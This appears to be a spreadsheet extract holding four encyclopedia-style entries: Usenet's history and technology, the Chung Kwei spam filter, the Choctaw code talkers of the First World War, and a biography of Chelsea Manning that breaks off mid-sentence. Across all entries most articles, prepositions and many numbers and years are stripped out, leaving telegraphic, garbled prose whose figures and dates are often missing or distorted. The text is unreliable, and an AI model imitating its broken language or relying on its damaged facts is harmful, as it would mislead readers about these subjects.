hill duke university, decade world wide went online (and thus general public received access internet), making oldest computer network communications systems still widespread use. originally built "poor man's arpanet", employing uucp transport protocol offer mail file transfers, well announcements newly developed news software news. name "usenet" emphasizes creators' hope usenix organization would take active role operation.the articles users post usenet organized topical categories known newsgroups, logically organized hierarchies subjects. instance, sci.math sci.physics within sci.* hierarchy. talk.origins talk.atheism talk.* hierarchy. when user subscribes newsgroup, news client software keeps track articles user read.in newsgroups, majority articles responses article. articles traced single non-reply article called thread. most modern newsreaders display articles arranged threads subthreads. example, wine-making newsgroup rec.crafts.winemaking, someone might start thread called; "what's best yeast?" thread conversation might grow dozens replies long, perhaps eight different authors. over several days, conversation different wine yeasts might branch several sub-threads tree-like form. when user posts article, initially available user's news server. each news server talks servers (its "newsfeeds") exchanges articles them. fashion, article copied server server eventually reach every server network. later peer-to-peer networks operate similar principle, usenet normally sender, rather receiver, initiates transfers. usenet designed conditions networks much slower always available. many sites original usenet network would connect twice batch-transfer messages out. this largely pots network typically used transfers, phone charges lower night. format transmission usenet articles similar internet e-mail messages. difference usenet articles read user whose news server carries group message posted, opposed email messages, specific recipients.today, usenet diminished importance respect internet forums, blogs, mailing lists social media. usenet differs media several ways: usenet requires personal registration group concerned; information need stored remote server; archives always available; reading messages require mail client, news client. however, possible read participate usenet newsgroups large degree using ordinary browsers since newsgroups copied several sites. groups alt.binaries still widely used data transfer. isps, news servers, newsfeeds many internet service providers, many internet sites, operate news servers users access. isps operate servers directly often offer users account another provider specifically operates newsfeeds. early news implementations, server newsreader single program suite, running system. today, uses separate newsreader client software, program resembles email client accesses usenet servers instead.not isps news servers. news server difficult internet services administer large amount data involved, small customer base (compared mainstream internet service), disproportionately high volume customer support incidents (frequently complaining missing news articles). some isps outsource news operations specialist sites, usually appear user though runs server. many sites carry restricted newsfeed, limited number newsgroups. commonly omitted newsfeed foreign-language newsgroups alt.binaries hierarchy largely carries software, music, videos images, accounts percent article data. there also usenet providers offer full unrestricted service users whose isps carry news, carry restricted feed. newsreaders newsgroups typically accessed newsreaders: applications allow users read reply postings newsgroups. these applications clients news servers. historically, usenet associated unix operating system developed at&amp;t, newsreaders available major operating systems. modern mail clients "communication suites" commonly also integrated newsreader. often, however, integrated clients quality, compared standalone newsreaders, incorrectly implement usenet protocols, standards conventions. many integrated clients, example microsoft's outlook express, disliked purists misbehavior.with rise world wide (www), front-ends (web2news) become common. front ends lowered technical entry barrier requirements application usenet nntp server account. there numerous websites offering based gateways usenet groups, although people begun filtering messages made interfaces reason another. google groups based front browsers access google groups news: protocol links directly. moderated unmoderated newsgroups minority newsgroups moderated, meaning messages submitted readers distributed directly usenet, instead emailed moderators newsgroup approval. moderator receive submitted articles, review them, inject approved articles properly propagated worldwide. articles approved moderator must bear approved: header line. moderators ensure messages readers newsgroup conform charter newsgroup, though required follow rules guidelines. typically, moderators appointed proposal newsgroup, changes moderators follow succession plan.historically, mod.* hierarchy existed usenet reorganization. now, moderated newsgroups appear hierarchy, typically .moderated added group name. usenet newsgroups big-8 hierarchy created proposals called request discussion, rfd. required following information: newsgroup name, checkgroups file entry, moderated unmoderated status. group moderated, least moderator valid email address must provided. other information beneficial required includes: charter, rationale, moderation policy group moderated. discussion newsgroup proposal follows, finished members big-8 management board making decision, vote, either approve disapprove newsgroup. unmoderated newsgroups form majority usenet newsgroups, messages submitted readers unmoderated newsgroups immediately propagated everyone see. minimal editorial content filtering propagation speed form crux usenet community. little cited defense propagation canceling propagated message, usenet users command news readers offer cancellation commands, part article storage expires relatively short order anyway. almost unmoderated usenet groups tend receive large amounts spam. technical details usenet protocols generating, storing retrieving news "articles" (which resemble internet mail messages) exchanging among readership potentially widely distributed. these protocols commonly flooding algorithm propagates copies throughout network participating servers. whenever message reaches server, server forwards message network neighbors seen article. only copy message stored server, server makes available demand (typically local) readers able access server. collection usenet servers thus certain peer-to-peer character share resources exchanging them, granularity exchange however different scale modern peer-to-peer system characteristic excludes actual users system connect news servers typical client-server application, much like email reader. first formal specification messages exchanged usenet servers. superseded 1036 subsequently 5536 5537. cases unsuitable content posted, usenet support automated removal posting whole network creating cancel message, although lack authentication resultant abuse, capability frequently disabled. copyright holders still request manual deletion infringing material using provisions world intellectual property organization treaty implementations, united states online copyright infringement liability limitation act, would require giving notice individual news server administrator. internet, usenet transported network news transfer protocol (nntp) port standard, unprotected connections port encrypted connections. organization major worldwide newsgroups contained within nine hierarchies, eight operated consensual guidelines govern administration naming. current eight are: comp.* computer-related discussions (comp.software, comp.sys.amiga) humanities.* fine arts, literature, philosophy (humanities.classics, humanities.design.misc) misc.* miscellaneous topics (misc.education, misc.forsale, misc.kids) news.* discussions announcements news (meaning usenet, current events) (news.groups, news.admin) rec.* recreation entertainment (rec.music, rec.arts.movies) sci.* science related discussions (sci.psychology, sci.research) soc.* social discussions (soc.college.org, soc.culture.african) talk.* talk various controversial topics (talk.religion, talk.politics, talk.origins)see also great renaming. alt.* hierarchy subject procedures controlling groups eight, result less organized. groups alt.* hierarchy tend specialized specific—for example, might newsgroup eight contains discussions children's books, group hierarchy dedicated specific author children's books. binaries posted alt.binaries.*, making largest hierarchies. many hierarchies newsgroups distributed alongside these. regional language-specific hierarchies japan.*, malta.* ne.* serve specific countries regions japan, malta england. companies projects administer hierarchies discuss products offer community technical support, historical gnu.* hierarchy free software foundation. microsoft closed newsserver june 2010, providing support products forums now. some users prefer term "usenet" refer eight hierarchies; others include alt.* well. general term "netnews" incorporates entire medium, including private organizational news systems. informal sub-hierarchy conventions also exist. *.answers typically moderated cross-post groups faqs. would posted within group cross post *.answers group head hierarchy seen refining information news group. some subgroups recursive—to point silliness alt.*. binary content usenet originally created distribute text content encoded 7-bit ascii character set. with help programs encode 8-bit values ascii, became practical distribute binary files content. binary posts, size often-dubious copyright status, time restricted specific newsgroups, making easier administrators allow disallow traffic. oldest widely used encoding method binary content uuencode, unix uucp package. late 1980s, usenet articles often limited 60,000 characters, larger hard limits exist today. files therefore commonly split sections require reassembly reader. with header extensions base64 quoted-printable mime encodings, generation binary transport. practice, mime seen increased adoption text messages, avoided binary attachments. some operating systems metadata attached files specialized encoding formats. binhex special mime types used. other lesser known encoding systems used time btoa, encoding, boo, encoding. attempt reduce file transfer times, informal file encoding known yenc introduced 2001. achieves reduction data transferred assuming 8-bit characters safely transferred across network without first encoding 7-bit ascii space. common method uploading large binary posts usenet convert files archives create parchive files them. parity files used recreate missing data every part files reaches server. binary retention time each news server allocates certain amount storage space content newsgroup. when storage filled, time post arrives, posts deleted make room content. network bandwidth available server high storage allocation small, possible huge flood incoming content overflow allocation push everything group average length time posts able stay server deleted commonly called retention time. binary newsgroups able function reliably sufficient storage allocated handle amount articles added. without sufficient retention time, reader unable download parts binary flushed group's storage allocation. this time posting undesired content countered; newsgroup would flooded random garbage data posts, sufficient quantity push content suppressed. this compensated service providers allocating enough storage retain everything posted day, including spam floods, without deleting anything. modern usenet news servers enough capacity archive years binary content even flooded data maximum daily speed available. part long retention times, well growing internet upload speeds, usenet also used individual users store backup data. while commercial providers offer easier online backup services, storing data usenet free charge (although access usenet be). method requires uploader cede control distribution data; files automatically disseminated usenet providers exchanging data news group posted general user must manually select, prepare upload data. data typically encrypted available anyone download backup files. after files uploaded, multiple copies spread different geographical regions around world different news servers decreases chances data loss. major usenet service providers retention time years. this results petabytes (60000 terabytes) storage (see image). when using usenet data storage, providers offer longer retention time preferred ensure data survive longer periods time compared services lower retention time. legal issues while binary newsgroups used distribute completely legal user-created works, free software, public domain material, binary groups used illegally distribute proprietary software, copyrighted media, pornographic material. isp-operated usenet servers frequently block access alt.binaries.* groups reduce network traffic avoid related legal issues. commercial usenet service providers claim operate telecommunications service, assert responsible user-posted binary content transferred equipment. united states, usenet providers qualify protection dmca safe harbor regulations, provided establish mechanism comply respond takedown notices copyright holders.removal copyrighted content entire usenet network nearly impossible task, rapid propagation servers retention done server. petitioning usenet provider removal removes server's retention cache, others. possible special post cancellation message distributed remove servers, many providers ignore cancel messages standard policy, easily falsified submitted anyone. takedown petition effective across whole network, would issued origin server content posted, propagated servers. removal content early stage would prevent propagation, modern high speed links, content propagated fast arrives, allowing time content review takedown issuance copyright holders.establishing identity person posting illegal content equally difficult trust-based design network. like smtp email, servers generally assume header origin information post true accurate. however, smtp email, usenet post headers easily falsified obscure true identity location message source. manner, usenet significantly different modern services; users distributing content typically immediately identifiable users network address, origin information usenet posting completely obscured unobtainable propagated past original server.also unlike modern services, identity downloaders hidden view. services downloader identifiable others network address. usenet, downloader connects directly server, server knows address connecting some usenet providers keep usage logs, make logged information casually available outside parties recording industry association america. existence anonymising gateways usenet also complicates tracing postings true origin. history newsgroup experiments first occurred 1979. truscott ellis duke university came idea replacement local announcement program, established link nearby university north carolina using bourne shell scripts written steve bellovin. public release news form conventional compiled software, written steve daniel truscott. 1980, usenet connected arpanet berkeley, connections usenet arpanet. mark horton, graduate student connection, began "feeding mailing lists arpanet usenet" "fa" ("from arpanet") identifier. usenet gained member sites first year, including reed college, university oklahoma, bell labs, number people using network increased dramatically; however, still longer usenet users could contribute arpanet. network uucp networks spread quickly lower costs involved, ability existing leased lines, x.25 links even arpanet connections. 1983, thousands people participated hosts, mostly universities bell labs sites also growing number unix-related companies; number hosts nearly doubled 1984. more newsgroups existed, devoted unix computer-related topics, least third recreation. mesh uucp hosts rapidly expanded, became desirable distinguish usenet subset overall network. vote taken 1982 usenix conference choose name. name usenet retained, established applied news. name uucpnet became common name overall network. addition uucp, early usenet traffic also exchanged fidonet dial-up networks. mid-1990s almost 40,000 fidonet systems operation, possible communicate millions users around world, local telephone service. widespread usenet community facilitated introduction uucp feeds made possible ms-dos implementations uucp, ufgate (uucp fidonet gateway), fsuucp uupc. 1986, provided network news transfer protocol (nntp) specification distribution usenet articles tcp/ip flexible alternative informal internet transfers uucp traffic. since internet boom 1990s, almost usenet distribution nntp. software early versions usenet used duke's news software, designed articles day. matt glickman horton berkeley produced improved version called news could handle rising traffic (about articles late 1983). with message format offered compatibility internet mail improved performance, became dominant server software. news, developed geoff collyer henry spencer university toronto, comparable news features offered considerably faster processing. early 1990s, internetnews rich salz developed take advantage continuous message flow made possible nntp versus batched store-and-forward design uucp. since time development continued, news server software also developed. public venue usenet first internet community place many important public developments pre-commercial internet. place berners-lee announced launch world wide web, linus torvalds announced linux project, marc andreessen announced creation mosaic browser introduction image tag, revolutionized world wide turning graphical medium. activist goodloe used platform maintain email list lgbt activism. internet jargon history many jargon terms common internet originated popularized usenet. likewise, many conflicts later spread rest internet, ongoing difficulties spamming, began usenet."usenet like herd performing elephants diarrhea. massive, difficult redirect, awe-inspiring, entertaining, source mind-boggling amounts excrement least expect it." decline sascha segan magazine said 2008 "usenet dying years". segan said people pointed eternal september 1993 beginning usenet's decline, began offering usenet access. argues users began putting large (non-text) files usenet late 1990s, usenet disk space traffic increased correspondingly. internet service providers questioned needed host space binary articles. discontinued usenet access 2005. 2010, duke university, whose implementation started usenet years earlier, decommissioned usenet server, citing usage rising costs. february 2011, usenet news service link university north carolina chapel hill (news.unc.edu) retired years.in response, john biggs techcrunch said long folks think command line better mouse, original text-only social network live on". while still active text newsgroups usenet, system primarily used share large files users, underlying technology usenet remains unchanged. usenet traffic changes over time, amount usenet traffic steadily increased. 2010 number text posts made big-8 newsgroups averaged 1,800 messages every hour, average 25,000 messages day. however, averages minuscule comparison traffic binary groups. much traffic increase reflects increase discrete users newsgroup discussions, instead combination massive automated spamming increase .binaries newsgroups large files often posted publicly. small sampling change (measured feed size day) follows: 2008, verizon communications, time warner cable sprint nextel signed agreement attorney general york andrew cuomo shut access sources child pornography. time warner cable stopped offering access usenet. verizon reduced access "big hierarchies. sprint stopped access alt.* hierarchies. at&amp;t stopped access alt.binaries.* hierarchies. cuomo never specifically named usenet anti-child pornography campaign. david dejean world said worry isps used cuomo's campaign excuse portions usenet access, costly internet service providers high demand customers. 2008 aol, longer offered usenet access, four providers responded cuomo campaign five largest internet service providers united states; u.s. market share. june 2009, at&amp;t announced would longer provide access usenet service july 2009.aol announced would discontinue integrated usenet service early 2005, citing growing popularity weblogs, chat forums on-line conferencing. community tremendous role popularizing usenet years earlier.in august 2009, verizon announced would discontinue access usenet september 2009. janet announced would discontinue usenet service, effective july 2010, citing google groups alternative.microsoft announced would discontinue support public newsgroups (msnews.microsoft.com) june 2010, offering forums alternative.primary reasons cited discontinuance usenet service general isps include decline volume actual readers competition blogs, along cost liability concerns increasing proportion traffic devoted file-sharing spam unused discontinued groups.some isps include pressure cuomo's campaign child pornography reasons dropping usenet feeds part services. isps atlantic communications resisted 2008 trend eventually drop respective usenet feeds 2010. archives public archives usenet articles existed since early days usenet, system created kenneth almquist late 1982. distributed archiving usenet posts suggested november 1982 scott orshan, proposed "every site keep articles posted, forever." also november year, rick adams responded post asking "has anyone archived netnews, anyone plan to?" stating was, "afraid admit started archiving 'useful' newsgroups september 18." june 1982, gregory woodbury proposed "automatic access archives" system consisted "automatic answering fixed-format messages special mail recipient specified machines."in 1985, news archiving systems posted internet. first system, called keepnews, mark swenson university arizona, described program attempts provide sane extracting keeping information comes usenet." main advantage system allow users mark articles worthwhile retain. second system, news archiver chuq rospach, similar keepnews, "designed work much larger archives wonderful quadratic search time feature unix becomes real problem." rospach early 1985 posted detailed "archiving accessing usenet articles keyword lookup." this described program could "generate maintain archive usenet articles allow looking articles based article-id, subject lines, keywords pulled article itself." also included code internal data structure system.the desire fulltext search index archived news articles either, request made april 1991 alex martelli sought "build sort keyword index [the news archive]." early may, martelli posted summary responses usenet, noting "most popular suggestion award must definitely 'lq-text' package, liam quin, recently posted alt.sources."the stories text repository (asstr) site archives indexes erotic pornographic stories posted usenet group alt.sex.stories.the archiving usenet fears loss privacy. archive simplifies ways profile people. this partly countered introduction x-no-archive: header, controversial. archives google groups dejanews web-based archiving usenet posts began 1995 deja news large, searchable database. 2001, database acquired google.google groups hosts archive usenet posts dating back 1981. earliest posts, date 1981 june 1991, donated google university western ontario help david wiseman others, originally archived henry spencer university toronto's zoology department. archives late 1991 early 1995 provided kent landfield netnews series jürgen christoffel gmd. archive posts march 1995 onward started company dejanews (later deja), purchased google february 2001. google began archiving usenet posts starting second week august 2000. google criticized vice wired contributors well former employees stewardship archive breaking search functionality. also usenet newsreaders usenet/newsgroup service providers usenet history usenet administrators usenet whole administrators. each server administrator free want, long users peer servers accept famous administrators: references further reading external links usenet information, software, service providers curlie ietf working group usefor (usenet article format), tools.ietf.org a-news archive: early usenet news articles: 1981 1982., quux.org utzoo archive: 2,000,000 articles early 1980s july 1991 "netscan". archived original june 2007. social accounting reporting tool living internet comprehensive history internet, including usenet. livinginternet.com usenet glossary comprehensive list usenet terminology</t>
  </si>
  <si>
    <t>Chung Kwei (algorithm)</t>
  </si>
  <si>
    <t>chung kwei spam filtering algorithm based teiresias algorithm finding coding genes within bulk dna. named zhong kui, figure chinese folklore. also spam (electronic) can-spam 2003 dnsbl spamassassin external links official report teiresias: sequence pattern discovery, bioinformatics group technique protects "evil" emails, newscientist.com "dna analysis" spots e-mail spam, news</t>
  </si>
  <si>
    <t>Choctaw code talkers</t>
  </si>
  <si>
    <t>choctaw code talkers group choctaw indians oklahoma pioneered native american languages military code world government choctaw nation maintains first american native code talkers ever serve military. they conferred texas medal valor 2007. origin code talking, practice using native american languages military code american armed forces, start world german forces proved speak excellent english also intercepted broken american military codes. american officer, colonel alfred wainwright bloor, noticed number american indians serving 142nd infantry france. overhearing choctaw indians speaking another, realized could understand them. also realized could understand them, would true germans, matter good english skills. besides, many native american languages never written down. with active cooperation choctaw soldiers, colonel bloor tested deployed code, using choctaw language place regular military code. first combat test took place october 1918, colonel bloor ordered "delicate" withdrawal companies battalion, chufilly chardeny. movement successful: "the enemy's complete surprise evidence could decipher messages", bloor observed. captured german officer confirmed "completely confused indian language gained benefit whatsoever" wiretaps. native americans already serving messengers runners units. placing choctaws company, messages could transmitted regardless radio overheard telephone lines tapped. postwar memo, bloor expressed pleasure satisfaction. confident possibilities telephone obtained without hazards." noted, however, choctaw tongue, itself, unable fully express military terminology use. choctaw word phrase existed describe "machine gun", example. choctaws improvised, using words "big gun" describe "artillery" "little shoot fast" "machine gun." "the results gratifying," bloor concluded. codetalkers made united states' first code talkers either full-blood mixed-blood choctaw indians. born choctaw nation indian territory, southeastern oklahoma, nation self-governed republic. later, tribes would languages military various units, notably navajo world ii.the known code talkers follows: albert billy (october 1885– 1959). billy, full blood choctaw, born howe, bois county, choctaw nation, indian territory. member 36th division, company mitchell bobb (january 1895-december 1921). bobb's place birth rufe, indian territory rufe, oklahoma choctaw nation. member 142nd infantry, company victor brown (1896–1966). brown born goodwater, kiamitia county, choctaw nation. carterby (december 1891 february 1953). carterby full blood choctaw roll number 2045 born ida, choctaw county, oklahoma. benjamin franklin colbert born september 1900 durant indian territory, died january 1964. youngest code talker. father, benjamin colbert rough rider spanish american war. george edwin davenport (april 1887 april 1950). davenport born finley, oklahoma. enlisted armed services home town. george also called james. george half brother joseph davenport. joseph harvey davenport finley, oklahoma, 1892. died april 1923 buried davenport family cemetery tucker ranch. james (jimpson) morrison edwards (october 1898 october 1962). edwards born golden, nashoba county, choctaw nation indian territory. member 142nd infantry, company tobias william frazier (august 1892– november 1975). full blood choctaw roll number 1823) frazier born cedar county, choctaw nation. member 142nd infantry, company benjamin wilburn hampton full blood choctaw roll number 10617) born 1892 bennington, blue county, choctaw nation, indian territory, bryan county, oklahoma. member 142nd infantry, company noel johnson code talker noel johnson, 142nd infantry, born august 1894 smithville indian territory. attended dwight indian training school. world draft registration stated weak eyes. great niece christine ludlow said killed france body returned otis wilson leader choctaw blood roll number 13606) born march 1882 today atoka county, oklahoma. died march 1961 buried coalgate cemetery. solomon bond louis (april 1898 february 1972). louis, full blood choctaw, born hochatown, eagle county, choctaw nation, indian territory. member 142nd infantry, company died bennington, bryan county, oklahoma 1972. pete maytubby born peter maytubby full blood chickasaw roll number 4685) september 1892 reagan, indian territory located johnston county, oklahoma. pete member 142nd infantry, company died 1964 buried tishomingo city cemetery tishomingo, oklahoma. jeff nelson (unknown). member 142nd infantry, company joseph oklahombi (may 1895 april 1960). oklahombi whose surname choctaw language means killer born bokchito, nashoba county, choctaw nation indian territory. member 143rd infantry, headquarters company. oklahombi oklahoma's decorated hero, medals display oklahoma historical society oklahoma city. robert taylor full blood choctaw roll number 916) born january 1894 idabel, mccurtain county, oklahoma (based registration military 1917). member 142nd infantry, company charles walter veach (may 1884 october 1966). (choctaw blood roll #10021) veach durant, (blue county i.t.)he served last choctaw legislature captain oklahoma national guard, oklahoma, company served border pancho villa crazy snake rebellion. remained captain company oklahoma, mustered company 142nd infantry, 36th division, army bowie, october 1917. after world represented choctaw nation inter-tribal council civilized tribes. buried highland cemetery, durant, oklahoma. calvin wilson calvin born june 1894 eagletown, eagle county, choctaw nation, indian territory. member 142nd infantry, company date death unknown. wilson's name misspelled military records "cabin." recognition little said written code talkers world earliest known mention media appears 1919 soldiers returned france. their return reported dozens newspapers across country. years ended, oklahoma city news described military actions. choctaw appear referred 'code talkers'. phrase coined world describing wartime activities family members, least member group, tobias frazier, always used phrase, "talking radio" meant field telephone. "new york, 31.-when steamship louisville arrived today brest [france] 1,897 troops board, considerable attention attracted detail indian soldiers command captain [elijah horner mena, ark. these indians credit unique achievement frustrating german wire tappers. under command chief george baconrid, indian osage reservation, transmitted orders choctaw, language included german studies." world navajo code talkers become subject movies, documentaries, books, choctaw. navajo, history opposing united states war, proven almost aspects popular subject quiet, orderly, agrarian choctaw indians, who, early 19th century, adopted american-style constitution government, complete elections separation powers.the choctaw government awarded code talkers posthumous choctaw medals valor special ceremony 1986. france followed suit 1989, awarding fifth republic's chevalier l'ordre national merite (knight national order merit).in 1995, choctaw memorial erected choctaw capitol building tuskahoma, oklahoma. includes huge section granite dedicated choctaw code talkers.on november 2008, code talkers recognition 2008 (public 110-420), signed president george bush, recognizes every native american code talker served united states military world world exception already-awarded navajo, congressional gold medal tribe, retained smithsonian institution, silver medal duplicate code talker. notes further reading bloor, colonel a.w. "transmitting messages choctaw." memo captain spence commanding general, 36th division, u.s. army. january 1919. national archives, washington, d.c. chastaine, captain story 36th. oklahoma city: harlow publishing company, 1920. oclc 2384186 meadows, william comanche code talkers world college station: university texas press, 2003. isbn 0292752636 oclc 49773679. meadows, william “they chance talk another…” role incidence native american code talking. ethnohistory 56(2):269-284. 2009 meadows, william "honoring native american code talkers: road code talkers recognition 2008 (public 110-420)." american indian research culture journal. 35(3)3-36. 2011. meadows, william honor long overdue: 2013 congressional gold silver medal ceremonies honor native american code talkers". american indian research culture journal, 40(2):91-121. 2016. white, lonnie 1982. "forming 36th division world military history texas southwest. oclc 11826450 external links find grave: albert billy find grave: mitchell bobb find grave: victor brown find grave: carterby</t>
  </si>
  <si>
    <t>Chelsea Manning</t>
  </si>
  <si>
    <t xml:space="preserve">chelsea elizabeth manning (born bradley edward manning; december 1987) american activist whistleblower. former united states army soldier convicted court-martial july 2013 violations espionage offenses, disclosing wikileaks nearly 750,000 classified, unclassified sensitive, military diplomatic documents. imprisoned 2010 2017 sentence commuted. trans woman, manning stated 2013 female gender identity since childhood wanted known chelsea manning. also expressed desire begin hormone replacement therapy.assigned 2009 army unit iraq intelligence analyst, manning access classified databases. early 2010, leaked classified information wikileaks confided adrian lamo, online acquaintance. lamo indirectly informed army's criminal investigation command, manning arrested year. material included videos july 2007, baghdad airstrike 2009 granai airstrike afghanistan; 251,287 u.s. diplomatic cables; 482,832 army reports came known "iraq logs" "afghan diary". material published wikileaks media partners april 2010 april 2011. manning charged offenses, including aiding enemy, serious charge could resulted death sentence. held marine corps brig, quantico virginia, july 2010 april 2011, prevention injury status—which entailed facto solitary confinement restrictions caused domestic international concern—before transferred joint regional correctional facility fort leavenworth, kansas, could interact detainees. pleaded guilty february 2013 charges. trial remaining charges began june 2013, july convicted original charges amended versions four others, acquitted aiding enemy. sentenced years maximum-security u.s. disciplinary barracks fort leavenworth. january 2017, president barack obama commuted manning's sentence nearly seven years confinement dating arrest 2010. after release, manning earned living speaking engagements.in 2018, manning challenged incumbent senator cardin democratic nomination united states senate election home state maryland. manning received 6.1% votes; cardin renomination 79.2% votes cast. from march 2019, march 2020 (except week 16), manning jailed contempt fined $256,000 refusing testify grand jury investigating wikileaks founder julian assange. background early life born bradley edward manning 1987 oklahoma city, oklahoma, second child susan welsh brian manning, american. brian joined united states navy 1974, served five years intelligence analyst. brian susan stationed wales brawdy. manning's older sister, casey manning, born 1976. couple returned united states 1979, settling first california. after move near crescent, oklahoma, bought house acres hectares) land, kept pigs chickens.manning's sister casey told court-martial parents alcoholics, mother drank continually pregnant chelsea. captain david moulton, navy psychiatrist, told court manning's facial features showed signs fetal alcohol syndrome. casey became manning's principal caregiver, waking night prepare baby's bottle. court heard manning milk baby food two. adult reached (1.57 weighed around pounds kg).manning's father took information technology (it) manager rental agency, hertz corporation, required travel. family lived several miles town, manning's mother unable drive. spent days drinking, manning left largely fend herself, playing lego computer. brian would stock food trips, leave pre-signed checks casey mailed bills. neighbor said whenever manning's elementary school went field trips, would give extra food money could make sure manning something eat. friends neighbors considered mannings troubled family. parents' divorce, move wales child, manning opinionated intersection religion politics. example, invariably remained silent part pledge allegiance makes reference god.in 2011 interview, manning's father said, "people need understand he's young happy life growing up." also said manning excelled saxophone, science, computers, created website manning learned powerpoint, grand prize three years local science fair, sixth grade, took prize statewide quiz bowl. childhood friend manning's, speaking conversation manning said: told gay". friend also said manning's home life good father controlling. around time, manning's parents divorced. mother susan moved house rented apartment crescent, oklahoma. susan's instability continued, 1998 attempted suicide; manning's sister drove mother hospital, 11-year-old manning sitting back trying make sure mother still breathing.manning's father remarried 2000, year divorce. wife, also named susan, previous relationship. when changed surname manning too, chelsea felt rejected, telling mother, "i'm nobody now, mom."in november 2001, manning mother left united states moved haverfordwest, wales, mother family. manning attended town's tasker milward secondary school. school friend told caesar sunday times manning's personality "unique, extremely unique. very quirky, opinionated, political, clever, articulate." manning's interest computers continued, 2003, friend, james kirkpatrick, online message board, angeldyne.com, offered games music downloads.the american, viewed effeminate, manning became target bullying school. manning come friends back oklahoma, open school wales. students frequently mocked accent. time, abandoned camping trip—of incident, aunt told washington post manning awoken empty campsite campers left without her. return united states after graduating high school 2005 fearing mother becoming cope, returned united states. moved father, living oklahoma city second wife child. manning landed employment developer software company zoto. while there, apparently happy; however, four months. boss told washington post occasions manning "just locked would simply stare, end, communication became difficult. boss told newspaper "nobody's taking care really long time".by then, manning living openly man. relationship father apparently good, problems manning stepmother. march 2006, manning reportedly threatened stepmother knife argument manning's failure another job; stepmother called police, manning asked leave house. manning drove tulsa pickup truck father given her, first slept moved friend school. gained jobs incredible pizza april. manning moved chicago running money nowhere stay. mother arranged brian's sister, debra, lawyer potomac, maryland, take manning american journalist manning biographer denver nicks wrote months manning spent aunt among stable life. manning boyfriend, took several low-paid jobs, spent semester studying history english montgomery college left failing exam. military service enlisting manning's father spent weeks late 2007 asking consider joining army. hoping gain college education g.i. bill, perhaps study physics, enlisted september year. told army supervisor later also hoped joining masculine environment would resolve gender identity disorder.manning began basic training fort leonard wood, missouri, october 2007. wrote soon realized neither physically mentally prepared weeks enlisting, sent discharge unit. allegedly bullied, opinion another soldier, breakdown. soldier told guardian: "the barely five foot runt, pick him. he's crazy, pick him. he's faggot, pick him. took every side. please anyone." nicks writes manning, used bullied, fought back—if drill sergeants screamed her, would scream them—to point started calling "general manning".the decision discharge revoked, started basic training january 2008. after graduating april, moved fort huachuca, arizona, order attend advanced individual training (ait) military occupational specialty (mos) 35f, intelligence analyst, receiving ts/sci security clearance (top secret/sensitive compartmented information). according nicks, security clearance, combined digitization classified information government's policy sharing widely, gave manning access unprecedented amount material. nicks writes manning reprimanded fort huachuca posting three video messages friends youtube, described inside sensitive compartmented information facility (scif) worked. upon completion initial course, manning received army service ribbon national defense service medal. move fort drum, deployment iraq august 2008, manning sent fort drum jefferson county, york, joined brigade combat team, 10th mountain division, trained deployment iraq. late 2008 stationed there, tyler watkins, studying neuroscience psychology brandeis university, near boston. watkins first serious relationship, posted happily facebook regularly traveling miles (480 boston visits.watkins introduced network friends university's hacker community. also visited boston university's "hackerspace" workshop, known "builds", founder, david house, researcher later allowed visit jail. november 2008, gave anonymous interview high-school reporter rally syracuse support marriage: kicked home lost job. world moving fast enough home, work, battlefield. i've living double life. can't make statement. can't caught act. hope public support changes. hope [expiration term service]. nicks writes manning would travel back washington, d.c., visits. ex-boyfriend helped find around city's community, introducing lobbyists, activists, white house aides. back fort drum, continued display emotional problems and, august 2009, referred army mental-health counselor. friend told nicks manning could emotionally fraught, describing evening watched movies together—the last king scotland dancer dark—after manning cried hours. september 2009, relationship watkins trouble; reconciled short time, effectively over.after four weeks joint readiness training center (jrtc) fort polk, louisiana, manning deployed forward operating base hammer, near baghdad, arriving october 2009. from workstation there, access siprnet (the secret internet protocol router network) jwics (the joint worldwide intelligence communications system). superiors discussed taking iraq; felt risk possibly others, according statement later issued army—but shortage intelligence analysts dictated decision take her. november 2009, promoted private first class specialist. contact gender counselor november 2009, manning wrote gender counselor united states, said felt female discussed surgery. counselor told steve fishman york magazine 2011 clear manning crisis, partly gender concerns, also opposed kind found involved.she accounts unhappy isolated. because military's "don't ask, tell" (dadt) policy effect september 2011), manning unable live openly without risk discharged. apparently made secret orientation: friends said kept fairy wand desk. when told roommate attracted men, responded suggesting speak other. manning's working conditions included 15-hour night shifts tightly packed, dimly room.on december 2009, counseling session colleagues discuss poor time-keeping, manning told would lose week persistent lateness. responded overturning table, damaging computer sitting sergeant moved manning away weapons rack, soldiers pinned arms behind back dragged room. several witnesses incident believed access sensitive material ought withdrawn point. following month, january 2010, began posting facebook felt hopeless alone. release material wikileaks manning said first contact wikileaks took place january 2010, began interact jabber. first noticed toward november 2009, posted 570,000 pager messages september attacks. january 2010, manning downloaded 400,000 documents became known iraq logs. january downloaded 91,000 documents afghanistan database, known later part afghan logs. saved material cd-rw smuggled security labeling cd-rw media "lady gaga" storing gaga case. lipsyncing lady gaga music, make appear using classified computer's player listen music. copied onto personal computer. next day, wrote message readme.txt file, told court initially intended washington post.manning copied files laptop card camera could take united states leave. army investigators later found card manning's basement room aunt's home, potomac, maryland. january manning flew united states germany, weeks leave. visit first went dressed woman, wearing makeup. after arrest, manning's friend tyler watkins told wired manning said visit found sensitive information considering leaking 2021, manning said home leave 2010, reached then-congressman, chris hollen, response.manning contacted washington post york times interested material; post reporter sound interested, times return call. manning decided instead pass wikileaks, february sent iraq afghan logs tor. returned iraq february acknowledgment wikileaks received files.on around february passed wikileaks diplomatic cable, dated january 2010, u.s. embassy reykjavík, iceland. they published within hours, suggested manning received material, too. found baghdad helicopter attack ("collateral murder") video judge advocate's directory passed wikileaks around february late march, sent video 2009 granai airstrike afghanistan; video later removed apparently destroyed daniel domscheit-berg left organization. between march april downloaded 250,000 diplomatic cables april uploaded wikileaks dropbox.manning told court that, interaction wikileaks jabber, developed friendship someone there, believed julian assange (although neither knew other's name), said made feel could herself. army investigators found pages encrypted chats, unallocated space macbook's hard drive, manning someone believed assange. wrote statement tried work, alienated became everyone around her. relationship wikileaks given brief respite isolation anxiety. email supervisor, recommended discharge april 2010, manning sent email supervisor, master sergeant paul adkins—with subject line problem"—saying suffering gender identity disorder. attached photograph dressed woman filename breanna.jpg. wrote: this problem. i've signs long time. it's caused problems within family. thought career military would it's something seek attention, i've trying very, hard placing situations would impossible. but, going away; haunting older. now, consequences dire, time causing great pain adkins discussed situation manning's therapists, pass email anybody chain command; told manning's court-martial concerned photograph would disseminated among staff. captain steven lim, manning's company commander, said first email manning's arrest, information hormone replacement therapy found manning's room base; point learned manning calling breanna.manning told former "grey hat" hacker adrian lamo twitter youtube accounts breanna give female identity digital presence, writing lamo: 